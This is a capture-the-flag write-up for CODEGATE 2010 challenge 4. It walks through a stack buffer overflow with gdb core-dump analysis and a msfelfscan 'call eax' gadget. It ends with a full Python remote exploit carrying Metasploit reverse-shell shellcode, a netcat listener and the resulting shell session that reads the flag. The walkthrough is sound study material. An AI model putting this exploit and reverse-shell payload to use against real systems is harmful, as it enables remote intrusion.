CODEGATE 2010 CHALLENGE 4

http://coma.0x3f.net/uncategorized/codegate2010-ctf-level-4/
I went through the solution posted on the site above, solved the challenge again myself, and wrote up my notes.

Through this challenge I got to see how to use msfelfscan and how to generate and debug a core file.
The trick of using \xcc (int3) to see where execution ends up looks like it will be really useful.

[byjjoon@ByJJoon CODEGATE]$ ulimit -c 50000
[byjjoon@ByJJoon CODEGATE]$ python -c "print 'A'*272" | ./easy   
Input: Segmentation fault (core dumped)
[byjjoon@ByJJoon CODEGATE]$ gdb easy core.14150 
GNU gdb Fedora (6.8-24.fc9)
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./easy'.
Program terminated with signal 11, Segmentation fault.
[New process 14150]
#0  0x41414141 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc.i686
(gdb) bt
#0  0x41414141 in ?? ()
#1  0x098c000a in ?? ()
#2  0x00000112 in ?? ()
#3  0x00a58420 in ?? () from /lib/libc.so.6
#4  0x00a57ff4 in ?? () from /lib/libc.so.6
#5  0x008e1dd0 in ?? () from /lib/ld-linux.so.2
#6  0x08048430 in ?? ()
#7  0x00000112 in ?? ()
#8  0x098cd008 in ?? ()
#9  0x08048590 in ?? ()
#10 0x08048430 in ?? ()
#11 0xbfe84218 in ?? ()
#12 0x009095d6 in __libc_start_main () from /lib/libc.so.6
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
(gdb) q

So the overwrite location is found: with 272 bytes of 'A' the saved return address is clobbered and the process crashes with EIP = 0x41414141. Now let's use msfelfscan from Metasploit to find a [call eax] in the binary. At the moment of the crash EAX points at our input buffer (the `x/32wx $eax` dump further down shows it full of our NOPs), and the non-PIE binary's code addresses (0x0804xxxx) do not move between runs, unlike the stack address of the buffer, so returning into `call eax` lands in our data without guessing a stack address.

[byjjoon@ByJJoon CODEGATE]$ ../Metasploit/msfelfscan easy -j eax
[easy]
0x080484df call eax
0x0804860b call eax

I picked 0x0804860b as the address to return into.

[byjjoon@ByJJoon CODEGATE]$ python -c "print '\x90'*268 + 'AAAA' + '\x90'*100" | ./easy 
Input: Segmentation fault (core dumped)
[byjjoon@ByJJoon CODEGATE]$ ls
core.14150  core.14155  easy
[byjjoon@ByJJoon CODEGATE]$ gdb easy core.14155 
GNU gdb Fedora (6.8-24.fc9)
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i386-redhat-linux-gnu"...

warning: Can't read pathname for load map: Input/output error.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Core was generated by `./easy'.
Program terminated with signal 11, Segmentation fault.
[New process 14155]
#0  0x41414141 in ?? ()
Missing separate debuginfos, use: debuginfo-install glibc.i686
(gdb) x/32wx $eax
0xbf9184e0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9184f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918500:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918510:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918520:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918530:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918540:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918550:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) 
0xbf918560:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918570:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918580:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918590:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185a0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185b0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185c0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf9185d0:     0x90909090      0x90909090      0x90909090      0x90909090
(gdb) 
0xbf9185e0:     0x90909090      0x90909090      0x90909090      0x41414141
0xbf9185f0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918600:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918610:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918620:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918630:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918640:     0x90909090      0x90909090      0x90909090      0x90909090
0xbf918650:     0x90909090      0xb7e8000a      0x00000000      0x00000000
(gdb) q

This confirms that EIP was overwritten exactly with 0x41414141 (AAAA). In the dump the 0x41414141 sits at 0xbf9185ec, which is 0x10c = 268 bytes past the start of the buffer EAX points to (0xbf9184e0), so the return-address offset really is 268, and the 100 NOPs after it are also inside EAX's buffer (the trailing 0x0a at 0xbf918654 is the newline that Python's print appended).
Now let's put the address we want in that slot and attack.

[byjjoon@ByJJoon CODEGATE]$ python -c "print '\x90'*268 + '\x0b\x86\x04\x08' + '\xcc'*300" | ./easy                               
Input: Trace/breakpoint trap (core dumped)
[byjjoon@ByJJoon CODEGATE]$ 

As intended, the process now dies with SIGTRAP (Trace/breakpoint trap) instead of SIGSEGV: `call eax` at 0x0804860b transferred execution into our buffer and the first \xcc (int3) fired.
Now let's build the payload with the layout below and attack.

[NOP*268] + [EIP] + [NOP*100] + [SHELLCODE]
#!/usr/bin/env python3
# Python 3 port of the exploit (the original ran under Python 2).
import socket
import time
from struct import pack

# linux/x86/shell_reverse_tcp - 98 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LHOST=211.218.16.105, LPORT=9999, ReverseConnectRetries=5,
# PrependSetresuid=false, PrependSetreuid=false,
# PrependSetuid=false, PrependChrootBreak=false,
# AppendExit=false
shellcode = b''
shellcode += b'\xba\x8b\xb0\xd0\x7f\xd9\xc2\xd9\x74\x24\xf4\x29\xc9\x5e'
shellcode += b'\xb1\x12\x31\x56\x15\x03\x56\x15\x83\xc6\x04\xe2\x7e\x81'
shellcode += b'\x0b\x88\x63\xb1\xe8\x24\x09\x34\x66\x2b\x7d\x5e\xb5\x2c'
shellcode += b'\x26\xc1\x2d\xfe\x02\xed\xc4\x66\xda\x29\x18\x01\x49\x5c'
shellcode += b'\x36\x9c\x3d\x29\xd7\x5d\xd7\x4f\x40\xaf\xa7\xc9\xf7\xf6'
shellcode += b'\x17\xd6\x3a\x88\x1e\x50\x3c\xd9\xc8\x8d\x91\xa9\x60\xba'
shellcode += b'\xc2\x2f\x19\x54\x94\x53\x89\xfb\x2f\x72\x99\xf7\xe2\xf5'

def send_payload(host, port, payload):
    print('[+] Connect - %s:%d' % (host, port))
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    banner = s.recv(128)                      # the "Input:" prompt
    print('[+] Receive - %s' % banner.decode(errors='replace'))
    time.sleep(2)
    print('[+] Sending Payload')
    s.sendall(payload)
    s.close()                                 # the shell connects back to LHOST:LPORT on its own

def main():
    host = 'ctf4.codegate.org'
    port = 9000

    # [NOP*268] + [saved EIP -> call eax @ 0x0804860b] + [NOP*100] + [shellcode]
    payload = b''
    payload += b'\x90' * 268
    payload += pack('<L', 0x0804860b)         # little-endian return address
    payload += b'\x90' * 100 + shellcode

    send_payload(host, port, payload)

if __name__ == '__main__':
    print('[+] Start!')
    main()
D:\Python Programming\PYTHON CODE\TEMPLATE>remote_exploit.py
[+] Start!
[+] Connect - ctf4.codegate.org:9000
[+] Receive - Input:
[+] Sending Payload
C:\Windows\SysWOW64>nc -l -p 9999 -vv
listening on [any] 9999 ...
222.239.224.233: inverse host lookup failed:  : Operation not permitted
connect to [211.218.16.105] from (UNKNOWN) [222.239.224.233] 58756

ls
ls: cannot open directory .: Permission denied
id
uid=1003(easy) gid=1003(easy)
pwd
/
cd /home/easy
ls
easy
examples.desktop
flag.txt
cat flag.txt
bc15d4ddf6ca486682064ad226a7ff1b  -
